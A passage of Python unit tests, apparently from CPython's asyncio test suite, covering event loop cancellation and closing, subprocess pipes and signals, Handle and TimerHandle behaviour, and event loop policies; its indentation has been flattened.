def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of calls is 12, but on some platforms the selector
# may sleep a little less than the timeout, depending on the resolution
# of the clock used by the kernel. Tolerate a few extra calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
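# Note on the run_in_executor check above: stepping an awaitable by hand with
# ``it = aw.__await__(); next(it)`` drives it up to its first suspension point,
# so an error raised before any await (here, the closed-loop RuntimeError)
# surfaces immediately without needing a running event loop. A minimal,
# self-contained illustration of the same pattern (not part of the test suite):
#
#     async def fail_fast():
#         raise RuntimeError('boom')   # raised before the first await
#
#     it = fail_fast().__await__()
#     try:
#         next(it)                     # propagates RuntimeError right away
#     except RuntimeError:
#         pass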
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
with self.assertWarns(DeprecationWarning):
    _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_at(loop.time(), noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
